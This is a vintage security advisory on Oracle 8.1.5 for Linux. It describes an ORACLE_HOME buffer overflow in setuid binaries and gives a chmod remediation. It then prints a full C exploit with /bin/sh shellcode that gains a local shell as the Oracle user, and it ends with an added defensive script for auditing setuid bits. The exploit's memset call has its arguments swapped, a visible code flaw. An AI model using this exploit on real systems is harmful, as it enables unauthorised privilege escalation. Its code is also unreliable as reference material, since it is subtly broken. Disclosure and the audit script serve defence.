[ SOURCE: http://www.secureroot.com/security/advisories/9735731635.html ]

================================================================================
[ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability
================================================================================

File      : Oracle 8.1.5
SYSTEM    : LINUX
Tested on : RedHat Linux 6.2

INFO      : There are two security vulnerabilities in Oracle.

1. Buffer overflow

It is possible to trigger a buffer overflow through "ORACLE_HOME", one of
Oracle's environment variables. The Oracle applications vulnerable to this
buffer overflow are as follows:

  - names
  - namesctl
  - onrsd
  - osslogin
  - tnslsnr
  - tnsping
  - trcasst
  - trcroute

Because these applications are installed setuid (see SOLUTION), they allow a
local attacker to execute a buffer overflow exploit.

2. Log files created

When a user executes one of the Oracle applications such as names, oracle or
tnslsnr, the following log files are created (owned by the oracle user and
the dba group, not by the user who ran the program):

names
======
-rw-rw-r--   1 oracle   dba         0 Oct 20 01:45 ckpcch.ora
-rw-rw-r--   1 oracle   dba       428 Oct 20 01:45 ckpreg.ora
-rw-rw-r--   1 oracle   dba       950 Oct 20 01:45 names.log

oracle
======
-rw-rw----   1 oracle   dba       616 Oct 20 05:14 ora_[running pid].trc

tnslsnr
=======
-rw-rw-r--   1 oracle   dba   2182176 Oct 20  2000 listener.log

SOLUTION

Contact your vendor for a patch, or remove the setuid permission from the
affected binaries:
  # su - oracle
  $ cd /oracle_8.1.5_install_directory/bin
  $ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute

==-------------------------------------------------------------------------------==
  loveyou@hackerslab.org [yong-jun, kim]
  [ http://www.hackerslab.org ]
  HACKERSLAB (C) since 1999
==-------------------------------------------------------------------------------==

/*
 * Oracle 8.1.5 exploit -by loveyou
 * offset value : -500 ~ +500
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFFER 800
#define NOP    0x90
#define PATH   "/hackerslab/loveyou/oracle/8.1.5/bin/names"

char shellcode[] =
/* - K2 - */
/* main: */
"\xeb\x1d"                 /* jmp callz */
/* start: */
"\x5e"                     /* popl %esi */
"\x29\xc0"                 /* subl %eax, %eax */
"\x88\x46\x07"             /* movb %al, 0x07(%esi) */
"\x89\x46\x0c"             /* movl %eax, 0x0c(%esi) */
"\x89\x76\x08"             /* movl %esi, 0x08(%esi) */
"\xb0\x0b"                 /* movb $0x0b, %al */
"\x87\xf3"                 /* xchgl %esi, %ebx */
"\x8d\x4b\x08"             /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c"             /* leal 0x0c(%ebx), %edx */
"\xcd\x80"                 /* int $0x80 */
"\x29\xc0"                 /* subl %eax, %eax */
"\x40"                     /* incl %eax */
"\xcd\x80"                 /* int $0x80 */
/* callz: */
"\xe8\xde\xff\xff\xff"     /* call start */
"/bin/sh";

/* current stack pointer, used as the base for the return-address guess */
unsigned long getesp(void)
{
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
    char *buff, *ptr, binary[120];
    long *addr_ptr, addr;
    int bsize = BUFFER;
    int i, offset;

    offset = 0;
    if (argc > 1)
        offset = atoi(argv[1]);

    buff = malloc(bsize);
    addr = getesp() - 5933 - offset;

    /* fill the whole buffer with the guessed address */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;

    memset(buff, bsize/2, NOP);

    /* place the shellcode in the middle of the buffer */
    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    buff[bsize - 1] = '\0';

    /* hand the oversized value to the setuid binary via ORACLE_HOME */
    setenv("ORACLE_HOME", buff, 1);

    printf("[ offset:%d buffer=%d ret:0x%x ]\n", offset, strlen(buff), addr);
    system(PATH);
}
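As an added example that is not part of the Hackerslab advisory: a POSIX shell function that audits the eight binaries named in the advisory under an ORACLE_HOME for the setuid/setgid bits and, when asked, applies the advisory's own remediation (chmod a-s) to each one it finds. The function name, the bin/ layout under ORACLE_HOME and the report/fix argument are assumptions of this example; the binary list is the advisory's.

```shell
#!/bin/sh
# Added example (not from the advisory): audit, and optionally strip, the
# setuid/setgid bits on the Oracle 8.1.5 binaries the advisory lists.
# Run as the oracle user (the file owner) or as root.

# Binary names taken from the advisory's SOLUTION section.
ORACLE_SETUID_BINS="names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute"

# audit_oracle_setuid <oracle_home> [report|fix]
#   Prints one line per listed binary that still has setuid or setgid set and
#   returns the number found (0 means clean). With "fix" as the second
#   argument it also runs "chmod a-s" on each one, as the advisory advises.
#   Binaries that are not installed are skipped silently.
audit_oracle_setuid() {
    home="$1"
    mode="${2:-report}"
    found=0
    for b in $ORACLE_SETUID_BINS; do
        f="$home/bin/$b"
        [ -f "$f" ] || continue            # not installed, nothing to check
        if [ -u "$f" ] || [ -g "$f" ]; then
            found=$((found + 1))
            printf '%s: setuid/setgid set (%s)\n' "$f" "$(ls -l "$f" | cut -d' ' -f1)"
            if [ "$mode" = fix ]; then
                chmod a-s "$f" && printf '%s: cleared\n' "$f"
            fi
        fi
    done
    return $found
}

# Usage: . ./oracle_setuid_check.sh
#        audit_oracle_setuid "$ORACLE_HOME"        # report only
#        audit_oracle_setuid "$ORACLE_HOME" fix    # report and clear
```

The return value doubles as the finding count, so the function can sit in a cron job or a post-install check and fail the step whenever any of the listed binaries regains the setuid bit (for example after a vendor re-install); run it once in report mode before applying fix mode, since clearing the bit removes the ability of unprivileged users to run those tools as oracle at all.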